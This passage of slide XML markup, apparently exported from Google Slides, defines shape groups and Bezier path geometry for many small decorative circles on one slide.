                <a:off x="12953481" y="2695301"/>
                <a:ext cx="47008" cy="43965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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="13106174" y="2316275"/>
                <a:ext cx="20545" cy="17670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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12882969" y="2054939"/>
                <a:ext cx="26379" cy="26463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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="13147264" y="194333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2" name="Google Shape;2372;p73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="13097212" y="3250271"/>
                <a:ext cx="38385" cy="35341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3" name="Google Shape;2373;p73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12524657" y="360579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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12791742" y="358228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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="13035662" y="3767194"/>
                <a:ext cx="53011" cy="5605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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12715396" y="3281215"/>
                <a:ext cx="76431" cy="71612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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12665597" y="3228373"/>
                <a:ext cx="44049" cy="39737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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12445182" y="1003506"/>
                <a:ext cx="35341" cy="35256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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12518738" y="1140895"/>
                <a:ext cx="41175" cy="41259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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12788952" y="3492753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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="13023910" y="2818064"/>
                <a:ext cx="44049" cy="4109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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="13000405" y="2388309"/>
                <a:ext cx="44049" cy="39822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83" name="Google Shape;2383;p73"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="10800000">
              <a:off x="5152162" y="1289857"/>
              <a:ext cx="3985907" cy="3918269"/>
              <a:chOff x="2524675" y="238075"/>
              <a:chExt cx="1178600" cy="1158600"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2384" name="Google Shape;2384;p73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3497400" y="667150"/>
                <a:ext cx="10425" cy="10450"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="418" w="417">
                    <a:moveTo>
                      <a:pt x="208" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="0"/>
                      <a:pt x="0" y="106"/>
                      <a:pt x="0" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="348"/>
                      <a:pt x="69" y="417"/>
                      <a:pt x="208" y="417"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="314" y="417"/>
                      <a:pt x="417" y="348"/>
                      <a:pt x="417" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="417" y="106"/>
                      <a:pt x="314" y="0"/>
                      <a:pt x="2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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3513025" y="588975"/>
                <a:ext cx="18300" cy="18300"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="732" w="732">
                    <a:moveTo>
                      <a:pt x="384" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="175" y="1"/>
                      <a:pt x="0" y="140"/>
                      <a:pt x="0" y="348"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="557"/>
                      <a:pt x="175" y="732"/>
                      <a:pt x="384" y="732"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="592" y="732"/>
                      <a:pt x="731" y="557"/>
                      <a:pt x="731" y="348"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="731" y="140"/>
                      <a:pt x="592" y="1"/>
                      <a:pt x="3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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3046675" y="353650"/>
                <a:ext cx="18225" cy="1822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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3635525" y="746225"/>
                <a:ext cx="13900" cy="13000"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="520" w="556">
                    <a:moveTo>
                      <a:pt x="278" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="0"/>
                      <a:pt x="0" y="103"/>
                      <a:pt x="0" y="242"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="417"/>
                      <a:pt x="139" y="520"/>
                      <a:pt x="278" y="520"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="417" y="520"/>
                      <a:pt x="556" y="417"/>
                      <a:pt x="556" y="242"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="556" y="103"/>
                      <a:pt x="417" y="0"/>
                      <a:pt x="2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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3680675" y="866075"/>
                <a:ext cx="6075" cy="5225"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="209" w="243">
                    <a:moveTo>
                      <a:pt x="103" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="0"/>
                      <a:pt x="0" y="34"/>
                      <a:pt x="0" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="173"/>
                      <a:pt x="70" y="209"/>
                      <a:pt x="103" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="209"/>
                      <a:pt x="242" y="173"/>
                      <a:pt x="242" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="242" y="34"/>
                      <a:pt x="173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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3614675" y="940750"/>
                <a:ext cx="7800" cy="7825"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="313" w="312">
                    <a:moveTo>
                      <a:pt x="139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3"/>
                      <a:pt x="70" y="312"/>
                      <a:pt x="139" y="312"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="242" y="312"/>
                      <a:pt x="312" y="243"/>
                      <a:pt x="312" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="312" y="70"/>
                      <a:pt x="242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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3370600" y="819175"/>
                <a:ext cx="7875" cy="7800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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3692825" y="97112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4" y="0"/>
                      <a:pt x="1" y="106"/>
                      <a:pt x="1" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="348"/>
                      <a:pt x="104" y="417"/>
                      <a:pt x="209" y="417"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="348" y="417"/>
                      <a:pt x="418" y="348"/>
                      <a:pt x="418" y="209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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3678025" y="584675"/>
                <a:ext cx="11350" cy="10450"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="418" w="454">
                    <a:moveTo>
                      <a:pt x="209" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="1"/>
                      <a:pt x="1" y="103"/>
                      <a:pt x="1" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="312"/>
                      <a:pt x="106" y="417"/>
                      <a:pt x="209" y="417"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="348" y="417"/>
                      <a:pt x="454" y="312"/>
                      <a:pt x="454" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="103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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3508725" y="48477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0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="0"/>
                      <a:pt x="0" y="36"/>
                      <a:pt x="0" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="175"/>
                      <a:pt x="69" y="209"/>
                      <a:pt x="103" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172" y="209"/>
                      <a:pt x="208" y="175"/>
                      <a:pt x="208" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="208" y="36"/>
                      <a:pt x="172" y="0"/>
                      <a:pt x="10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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3587700" y="488250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0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="0"/>
                      <a:pt x="1" y="70"/>
                      <a:pt x="1" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="278"/>
                      <a:pt x="70" y="347"/>
                      <a:pt x="176" y="347"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="245" y="347"/>
                      <a:pt x="315" y="278"/>
                      <a:pt x="315" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="315" y="70"/>
                      <a:pt x="245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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2590675" y="7219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1" y="103"/>
                      <a:pt x="1" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="348"/>
                      <a:pt x="70" y="417"/>
                      <a:pt x="209" y="417"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="315" y="417"/>
                      <a:pt x="418" y="348"/>
                      <a:pt x="418" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="418" y="103"/>
                      <a:pt x="315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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2643700" y="910325"/>
                <a:ext cx="7800" cy="7875"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="315" w="312">
                    <a:moveTo>
                      <a:pt x="173" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="1"/>
                      <a:pt x="0" y="70"/>
                      <a:pt x="0" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="245"/>
                      <a:pt x="70" y="315"/>
                      <a:pt x="173" y="315"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="242" y="315"/>
                      <a:pt x="312" y="245"/>
                      <a:pt x="312" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="312" y="70"/>
                      <a:pt x="242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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2628050" y="473500"/>
                <a:ext cx="13025" cy="13925"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="557" w="521">
                    <a:moveTo>
                      <a:pt x="243" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="1"/>
                      <a:pt x="1" y="140"/>
                      <a:pt x="1" y="279"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="418"/>
                      <a:pt x="104" y="557"/>
                      <a:pt x="243" y="557"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="382" y="557"/>
                      <a:pt x="521" y="418"/>
                      <a:pt x="521" y="279"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="521" y="140"/>
                      <a:pt x="382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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2711425" y="423125"/>
                <a:ext cx="11300" cy="10450"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="418" w="452">
                    <a:moveTo>
                      <a:pt x="209" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="1"/>
                      <a:pt x="1" y="104"/>
                      <a:pt x="1" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="348"/>
                      <a:pt x="104" y="418"/>
                      <a:pt x="209" y="418"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="348" y="418"/>
                      <a:pt x="451" y="348"/>
                      <a:pt x="451" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="451" y="104"/>
                      <a:pt x="348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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2823450" y="422225"/>
                <a:ext cx="7875" cy="7875"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="315" w="315">
                    <a:moveTo>
                      <a:pt x="175" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="1"/>
                      <a:pt x="0" y="70"/>
                      <a:pt x="0" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="245"/>
                      <a:pt x="69" y="315"/>
                      <a:pt x="175" y="315"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="245" y="315"/>
                      <a:pt x="314" y="245"/>
                      <a:pt x="314" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="314" y="70"/>
                      <a:pt x="245" y="1"/>
                      <a:pt x="1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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2628900" y="350175"/>
                <a:ext cx="24350" cy="23450"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="938" w="974">
                    <a:moveTo>
                      <a:pt x="487" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="209" y="1"/>
                      <a:pt x="0" y="209"/>
                      <a:pt x="0" y="487"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="729"/>
                      <a:pt x="209" y="937"/>
                      <a:pt x="487" y="937"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="731" y="937"/>
                      <a:pt x="973" y="729"/>
                      <a:pt x="973" y="487"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="973" y="209"/>
                      <a:pt x="731" y="1"/>
                      <a:pt x="4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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2524675" y="617675"/>
                <a:ext cx="8700" cy="8725"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="349" w="348">
                    <a:moveTo>
                      <a:pt x="176" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="1"/>
                      <a:pt x="1" y="70"/>
                      <a:pt x="1" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="242"/>
                      <a:pt x="70" y="348"/>
                      <a:pt x="176" y="348"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="245" y="348"/>
                      <a:pt x="348" y="242"/>
                      <a:pt x="348" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="348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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2675800" y="10102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0" y="69"/>
                      <a:pt x="0" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="311"/>
                      <a:pt x="106" y="417"/>
                      <a:pt x="209" y="417"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="314" y="417"/>
                      <a:pt x="417" y="311"/>
                      <a:pt x="417" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="417" y="69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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3659825" y="425700"/>
                <a:ext cx="15675" cy="16575"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="663" w="627">
                    <a:moveTo>
                      <a:pt x="312" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="1"/>
                      <a:pt x="1" y="140"/>
                      <a:pt x="1" y="315"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="523"/>
                      <a:pt x="140" y="662"/>
                      <a:pt x="312" y="662"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="487" y="662"/>
                      <a:pt x="626" y="523"/>
                      <a:pt x="626" y="315"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="626" y="140"/>
                      <a:pt x="487" y="1"/>
                      <a:pt x="3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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2648000" y="449175"/>
                <a:ext cx="31600" cy="26675"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="1067" w="1264">
                    <a:moveTo>
                      <a:pt x="682" y="137"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="698" y="137"/>
                      <a:pt x="715" y="138"/>
                      <a:pt x="732" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="940" y="173"/>
                      <a:pt x="973" y="418"/>
                      <a:pt x="940" y="590"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="922" y="715"/>
                      <a:pt x="876" y="794"/>
                      <a:pt x="809" y="851"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="809" y="851"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="800" y="843"/>
                      <a:pt x="783" y="835"/>
                      <a:pt x="765" y="835"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="733" y="877"/>
                      <a:pt x="700" y="910"/>
                      <a:pt x="666" y="934"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="666" y="934"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="632" y="948"/>
                      <a:pt x="595" y="961"/>
                      <a:pt x="556" y="974"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="554" y="977"/>
                      <a:pt x="551" y="979"/>
                      <a:pt x="549" y="982"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="549" y="982"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="538" y="984"/>
                      <a:pt x="527" y="984"/>
                      <a:pt x="516" y="984"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="378" y="984"/>
                      <a:pt x="253" y="856"/>
                      <a:pt x="209" y="660"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="398"/>
                      <a:pt x="418" y="137"/>
                      <a:pt x="682" y="137"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="654" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="645" y="0"/>
                      <a:pt x="636" y="1"/>
                      <a:pt x="626" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="279" y="34"/>
                      <a:pt x="1" y="382"/>
                      <a:pt x="106" y="765"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="958"/>
                      <a:pt x="307" y="1054"/>
                      <a:pt x="458" y="1054"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="489" y="1054"/>
                      <a:pt x="519" y="1050"/>
                      <a:pt x="549" y="1043"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="549" y="1043"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="552" y="1043"/>
                      <a:pt x="554" y="1043"/>
                      <a:pt x="556" y="1043"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="596" y="1059"/>
                      <a:pt x="633" y="1066"/>
                      <a:pt x="669" y="1066"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1103" y="1066"/>
                      <a:pt x="1264" y="0"/>
                      <a:pt x="6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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3425350" y="388400"/>
                <a:ext cx="13000" cy="13025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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3446175" y="364000"/>
                <a:ext cx="30800" cy="26550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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3565125" y="564800"/>
                <a:ext cx="22600" cy="21175"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="847" w="904">
                    <a:moveTo>
                      <a:pt x="471" y="127"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="575" y="127"/>
                      <a:pt x="672" y="210"/>
                      <a:pt x="695" y="309"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="765" y="343"/>
                      <a:pt x="765" y="448"/>
                      <a:pt x="732" y="518"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="732" y="538"/>
                      <a:pt x="728" y="555"/>
                      <a:pt x="721" y="571"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="721" y="571"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="711" y="589"/>
                      <a:pt x="700" y="605"/>
                      <a:pt x="688" y="620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="688" y="620"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="667" y="643"/>
                      <a:pt x="642" y="664"/>
                      <a:pt x="622" y="685"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="622" y="685"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="573" y="721"/>
                      <a:pt x="517" y="739"/>
                      <a:pt x="459" y="739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="388" y="739"/>
                      <a:pt x="314" y="712"/>
                      <a:pt x="245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8" y="140"/>
                      <a:pt x="430" y="127"/>
                      <a:pt x="471" y="127"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="462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37" y="240"/>
                      <a:pt x="1" y="551"/>
                      <a:pt x="209" y="759"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="280" y="819"/>
                      <a:pt x="356" y="846"/>
                      <a:pt x="429" y="846"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="483" y="846"/>
                      <a:pt x="536" y="831"/>
                      <a:pt x="585" y="803"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="585" y="803"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="587" y="804"/>
                      <a:pt x="591" y="804"/>
                      <a:pt x="594" y="804"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="603" y="804"/>
                      <a:pt x="613" y="802"/>
                      <a:pt x="626" y="796"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="871" y="759"/>
                      <a:pt x="904" y="412"/>
                      <a:pt x="801" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="729" y="87"/>
                      <a:pt x="595" y="1"/>
                      <a:pt x="4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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2581175" y="556825"/>
                <a:ext cx="23425" cy="20875"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="835" w="937">
                    <a:moveTo>
                      <a:pt x="461" y="119"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="559" y="119"/>
                      <a:pt x="674" y="199"/>
                      <a:pt x="728" y="281"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="764" y="350"/>
                      <a:pt x="764" y="420"/>
                      <a:pt x="764" y="489"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="757" y="509"/>
                      <a:pt x="749" y="527"/>
                      <a:pt x="740" y="545"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="740" y="545"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="739" y="544"/>
                      <a:pt x="737" y="544"/>
                      <a:pt x="736" y="544"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="731" y="544"/>
                      <a:pt x="728" y="548"/>
                      <a:pt x="728" y="559"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="718" y="580"/>
                      <a:pt x="706" y="600"/>
                      <a:pt x="693" y="617"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="693" y="617"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="681" y="633"/>
                      <a:pt x="669" y="648"/>
                      <a:pt x="655" y="663"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="655" y="663"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="600" y="718"/>
                      <a:pt x="534" y="745"/>
                      <a:pt x="468" y="745"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="401" y="745"/>
                      <a:pt x="334" y="717"/>
                      <a:pt x="278" y="662"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="489"/>
                      <a:pt x="208" y="245"/>
                      <a:pt x="381" y="142"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
